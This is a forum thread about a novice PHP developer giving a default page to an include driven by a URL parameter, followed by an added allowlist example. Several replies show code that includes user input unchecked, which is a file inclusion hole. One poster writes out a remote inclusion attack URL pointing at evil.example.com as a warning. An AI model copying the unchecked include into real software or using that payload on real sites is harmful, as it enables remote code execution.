  1. #1
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718

    <?php include ("$link.php"); ?> {novice}

    hi all.

    just a basic question really, i have
    PHP Code:
    <?php include ("$link.php"); ?>
    included on my index, works fine when i link to it, example:
    PHP Code:
    index.php?link=news 
    problem is this is my index page and when it loads it just throws an error:

    Code:
    Warning: main(.php): failed to open stream: No such file or directory in /home/site/public_html/index.php on line 9
    
    Warning: main(.php): failed to open stream: No such file or directory
    how can i have content shown in this include from the start? more like a default until i link to it??

    if this makes sense, thanks!!!

  2. #2
    SitePoint Wizard silver trophy Jelena's Avatar
    Join Date
    Feb 2005
    Location
    Universum, 3rd Corner
    Posts
    3,000
    PHP Code:
    // Fall back to "default" when no ?link= parameter is present
    if (!isset($_GET["link"]))
    {
        $link = "default";
    }
    else
    {
        $link = $_GET["link"];
    }
    include($link . ".php");
    Also, even if $_GET["link"] is set, you should check if it's empty.
    -- Jelena --

  3. #3
    SitePoint Zealot krt's Avatar
    Join Date
    Sep 2005
    Location
    Australia
    Posts
    114
    When accessing a GET variable (from the URL, eg. the 'link' variable in your case), use $_GET, you can also specify a default value:
    PHP Code:
    $link = isset($_GET['link']) ? $_GET['link'] : 'default';
    Note that you should never have a variable in an include statement when it is at the beginning as someone could request this:
    index.php?link=http://evil.example.com/hack.php?
    And then the attacker could execute any PHP code on your server, very bad security hole.
    Use a path before the variable or whitelist allowed 'links'.
    Eg:
    PHP Code:
    include "./$link.php";
    Even the above has its problems, eg. .htaccess files and .htpasswd functions could be accessed.

  4. #4
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    i want to load some data from the start and then make it change once i click a link.

    so what ur saying here? can u just explain what the above is doing?

    if there is no data load the default? am i right?

    thanks

  5. #5
    SitePoint Wizard silver trophy Jelena's Avatar
    Join Date
    Feb 2005
    Location
    Universum, 3rd Corner
    Posts
    3,000
    If there is no link variable defined, it will include file that is named default.php
    Therefore, you should have default.php which will have data you would like to include from the start.
    -- Jelena --

  6. #6
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    great stuff!! got it working.

    PHP Code:
    <?php
    $link = isset($_GET['link']) ? $_GET['link'] : 'default';
    include("./$link.php");
    ?>
    so whats the problem with this regarding security? i added ./ to the $link, so how does this help?

    and now all my other links look like

    Code:
    http://mysite.com/index.php?link=news
    will this cause me problems?

    thanks !!

  7. #7
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    Use a path before the variable or whitelist allowed 'links'.
    Eg:
    PHP Code:
    include "./$link.php"
    whats whitelist?

    Even the above has its problems, eg. .htaccess files and .htpasswd functions could be accessed.
    so how do u secure yourself against this?

    thanks!

  8. #8
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    any1?

  9. #9
    SitePoint Enthusiast
    Join Date
    Nov 2005
    Posts
    52
    i think it's not a good idea to do this cuz if a user types
    http://yoursite.com/index.php?link=blah~~~
    and that file doesn't exist you will get an error
    instead you can do it like:
    PHP Code:
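    // Treat a missing ?link= parameter as "no match"
    $page = isset($_GET['link']) ? trim(addslashes($_GET['link'])) : '';
    if ($page == "news") {
        include "news.php";
    } elseif ($page == "downloads") {
        include "downloads.php";
    } elseif ($page == "whatever") {
        include "whatever.php";
    } else {
        // Anything not listed above falls back to the main page
        include "main.php";
    }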

    so in the above case if a user types index.php?link=nocase that won't match any of the cases, so it will display the main page to the user instead of giving php errors

  10. #10
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    yes that was my next question, i tried putting in false info

    Code:
    http://yoursite.com/index.php?link=blah~~~
    and it gave an error with all my directories,

    and r u saying all the links i have to index.php?link= will need to be included in the code like u did above and if any other links try to run it will return to the default? main.php as u put.

    thanks

  11. #11
    SitePoint Enthusiast
    Join Date
    Nov 2005
    Posts
    52
    in the above example if a user posts any false information he won't get an error, the script will include the main page

  12. #12
    PHP Brainiac dg_den_golotyuk's Avatar
    Join Date
    Jul 2006
    Location
    Kiev, Ukraine
    Posts
    335
    Try this one:

    PHP Code:
    ...
    $link = !empty($_GET['link']) ? $_GET['link'] : 'default'; // default.php is the default file for inclusion

    include("$link.php");
    ... 
    DG [Den Golotyuk], Lead Developer
    Chestnut Software

  13. #13
    SitePoint Zealot krt's Avatar
    Join Date
    Sep 2005
    Location
    Australia
    Posts
    114
    Whitelisting is listing all the allowed options (like in ak007's code)

    Prepending a path eg. ./ protects the code because it stops a potential hacker from using http://evil.example.com/hack.php? as the include path, now if someone tries this, it will try to include the invalid file: ./http://evil.example.com/hack.php?

  14. #14
    SitePoint Wizard
    Join Date
    Dec 2005
    Posts
    1,718
    yes thanks all, i've used ak007's idea and it works fine. thanks, it just means me adding a new line of code each time i add a new link to this include.

    CHEERS!!!
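
The whitelist approach discussed in this thread, written as an array lookup so that a new page is one array entry rather than another `elseif` branch. This is an added example, not code from any poster in the thread; the page names, the `pages/` directory and the `resolve_page()` helper are assumptions for illustration.

```php
<?php
// Added example: allowlist lookup for the ?link= parameter (not code from the thread).
// PAGES_DIR, the page names and resolve_page() are assumptions for illustration.
const PAGES_DIR = __DIR__ . '/pages';
const PAGES = [
    'default'   => 'default.php',
    'news'      => 'news.php',
    'downloads' => 'downloads.php',
];

/**
 * Map the request's "link" value to a file path chosen by the server.
 * The user's string is only ever used as an array key, never as part of a path,
 * so URLs, dotfiles and unknown names all fall back to the default page.
 */
function resolve_page(array $query): string
{
    $link = $query['link'] ?? 'default';
    // ?link[]=x arrives as an array; an empty string is treated like "not set".
    if (!is_string($link) || $link === '' || !array_key_exists($link, PAGES)) {
        $link = 'default';
    }
    return PAGES_DIR . '/' . PAGES[$link];
}

// Constructed sample requests, using the values mentioned in the thread.
$samples = [
    [],
    ['link' => 'news'],
    ['link' => ''],
    ['link' => 'blah~~~'],
    ['link' => 'http://evil.example.com/hack.php?'],
    ['link' => '.htaccess'],
    ['link' => ['news']],
];
foreach ($samples as $query) {
    echo json_encode($query), ' -> ', basename(resolve_page($query)), "\n";
}

// In index.php the call would be:
// include resolve_page($_GET);
```

Because the included path is built only from values in `PAGES`, a request for a missing or unexpected name never reaches `include` and never produces the path-revealing warning shown in the first post.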

